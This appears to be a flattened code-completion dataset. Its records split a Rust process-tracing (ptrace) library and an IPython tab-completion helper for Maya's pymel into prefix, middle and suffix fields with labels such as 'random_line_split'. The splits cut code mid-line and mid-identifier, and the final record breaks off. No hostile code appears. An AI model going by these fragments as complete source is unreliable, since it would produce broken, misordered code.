pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct Tracer {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach to a tracer with the specified PID. This will stop it.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a | /// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would be to have
/// control over exactly what gets requested from to the kernel.
pub fn pop_one(&mut self) -> Result<Option<Event>> {
let mut event = syscall::PtraceEvent::default();
match self.inner.file.read(&mut event)? {
0 => Ok(None),
_ => Ok(Some(Event::new(event))),
}
}
/// Returns an iterator over ptrace events. This is a blocking stream.
pub fn iter(&self) -> Result<impl Iterator<Item = Result<Event>>> {
self.inner.events()
}
/// Handle non-breakpoint events by calling a specified callback until
/// breakpoint is reached
pub fn from_callback<F, E>(self, mut callback: F) -> std::result::Result<Event, E>
where
F: FnMut(Event) -> std::result::Result<(), E>,
E: From<io::Error>,
{
let mut events = self.iter()?;
loop {
let event = events.next().expect("events should be an infinite stream")?;
if event.cause & Flags::EVENT_ALL == event.cause {
callback(event)?;
} else {
break Ok(event);
}
}
}
/// Ignore non-blocking events, just acknowledge them and move on
pub fn ignore(self) -> Result<Event> {
self.from_callback(|_| Ok(()))
}
}
pub struct NonblockTracer {
old_flags: Option<usize>,
inner: Tracer,
}
impl NonblockTracer {
/// Similar to `Tracer::attach`, but opens directly in nonblocking
/// mode which saves one system call.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
old_flags: None,
inner: Tracer {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.custom_flags(syscall::O_NONBLOCK as i32)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
},
})
}
/// Sets a breakpoint on the specified stop, without doing
/// anything else: No handling of events, no getting what
/// breakpoint actually caused this, no waiting for the
/// breakpoint.
pub fn next(&mut self, flags: Flags) -> Result<()> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(())
}
/// Stub that prevents you from accidentally calling `next_event`
/// on the tracer, do not use.
#[deprecated(
since = "forever",
note = "Do not use next_event on a nonblocking tracer"
)]
pub fn next_event(&mut self, _flags: Flags) -> Result<EventHandler> {
panic!("Tried to use next_event on a nonblocking tracer")
}
/// Convert this tracer back to a blocking version. Any yet unread
/// events are ignored.
pub fn blocking(self) -> Result<Tracer> {
self.events()?.for_each(|_| ());
let old_flags = match self.old_flags {
Some(flags) => flags,
None => {
let flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
flags & !syscall::O_NONBLOCK
},
};
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
old_flags,
))?;
Ok(self.inner)
}
}
impl Deref for NonblockTracer {
type Target = Tracer;
fn deref(&self) -> &Self::Target {
&self.inner
}
}
impl DerefMut for NonblockTracer {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.inner
}
}
impl fmt::Debug for NonblockTracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "NonblockTracer(...)")
}
} | random_line_split |
|
lib.rs | use bitflags::bitflags;
use std::{
fmt,
fs::{File, OpenOptions},
io::{self, prelude::*, Result, SeekFrom},
iter,
mem::{self, MaybeUninit},
ops::{Deref, DerefMut},
os::unix::{
fs::OpenOptionsExt,
io::AsRawFd,
},
ptr, slice,
};
mod arch;
mod kernel;
macro_rules! trace {
($($inner:expr),*) => {{
if cfg!(feature = "trace") {
dbg!($($inner),*)
} else {
($($inner),*)
}
}};
}
fn e<T>(res: syscall::Result<T>) -> Result<T> {
res.map_err(|err| io::Error::from_raw_os_error(err.errno))
}
bitflags! {
pub struct Flags: u64 {
const STOP_PRE_SYSCALL = syscall::PTRACE_STOP_PRE_SYSCALL.bits();
const STOP_POST_SYSCALL = syscall::PTRACE_STOP_POST_SYSCALL.bits();
const STOP_SINGLESTEP = syscall::PTRACE_STOP_SINGLESTEP.bits();
const STOP_SIGNAL = syscall::PTRACE_STOP_SIGNAL.bits();
const STOP_BREAKPOINT = syscall::PTRACE_STOP_BREAKPOINT.bits();
const STOP_EXIT = syscall::PTRACE_STOP_EXIT.bits();
const STOP_ALL = Self::STOP_PRE_SYSCALL.bits
| Self::STOP_POST_SYSCALL.bits | Self::STOP_SINGLESTEP.bits
| Self::STOP_SIGNAL.bits | Self::STOP_BREAKPOINT.bits
| Self::STOP_EXIT.bits;
const EVENT_CLONE = syscall::PTRACE_EVENT_CLONE.bits();
const EVENT_ALL = Self::EVENT_CLONE.bits;
const FLAG_IGNORE = syscall::PTRACE_FLAG_IGNORE.bits();
const FLAG_ALL = Self::FLAG_IGNORE.bits;
}
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct | {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach to a tracer with the specified PID. This will stop it.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a
/// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would be to have
/// control over exactly what gets requested from to the kernel.
pub fn pop_one(&mut self) -> Result<Option<Event>> {
let mut event = syscall::PtraceEvent::default();
match self.inner.file.read(&mut event)? {
0 => Ok(None),
_ => Ok(Some(Event::new(event))),
}
}
/// Returns an iterator over ptrace events. This is a blocking stream.
pub fn iter(&self) -> Result<impl Iterator<Item = Result<Event>>> {
self.inner.events()
}
/// Handle non-breakpoint events by calling a specified callback until
/// breakpoint is reached
pub fn from_callback<F, E>(self, mut callback: F) -> std::result::Result<Event, E>
where
F: FnMut(Event) -> std::result::Result<(), E>,
E: From<io::Error>,
{
let mut events = self.iter()?;
loop {
let event = events.next().expect("events should be an infinite stream")?;
if event.cause & Flags::EVENT_ALL == event.cause {
callback(event)?;
} else {
break Ok(event);
}
}
}
/// Ignore non-blocking events, just acknowledge them and move on
pub fn ignore(self) -> Result<Event> {
self.from_callback(|_| Ok(()))
}
}
pub struct NonblockTracer {
old_flags: Option<usize>,
inner: Tracer,
}
impl NonblockTracer {
/// Similar to `Tracer::attach`, but opens directly in nonblocking
/// mode which saves one system call.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
old_flags: None,
inner: Tracer {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.custom_flags(syscall::O_NONBLOCK as i32)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
},
})
}
/// Sets a breakpoint on the specified stop, without doing
/// anything else: No handling of events, no getting what
/// breakpoint actually caused this, no waiting for the
/// breakpoint.
pub fn next(&mut self, flags: Flags) -> Result<()> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(())
}
/// Stub that prevents you from accidentally calling `next_event`
/// on the tracer, do not use.
#[deprecated(
since = "forever",
note = "Do not use next_event on a nonblocking tracer"
)]
pub fn next_event(&mut self, _flags: Flags) -> Result<EventHandler> {
panic!("Tried to use next_event on a nonblocking tracer")
}
/// Convert this tracer back to a blocking version. Any yet unread
/// events are ignored.
pub fn blocking(self) -> Result<Tracer> {
self.events()?.for_each(|_| ());
let old_flags = match self.old_flags {
Some(flags) => flags,
None => {
let flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
flags & !syscall::O_NONBLOCK
},
};
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
old_flags,
))?;
Ok(self.inner)
}
}
impl Deref for NonblockTracer {
type Target = Tracer;
fn deref(&self) -> &Self::Target {
&self.inner
}
}
impl DerefMut for NonblockTracer {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.inner
}
}
impl fmt::Debug for NonblockTracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "NonblockTracer(...)")
}
}
| Tracer | identifier_name |
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be setup if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
allows for completion of objects that reside within a namespace. for example,
``tra*`` will match ``trak:camera`` and ``tram``
for now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
# we have a full node, get it's children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
|
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
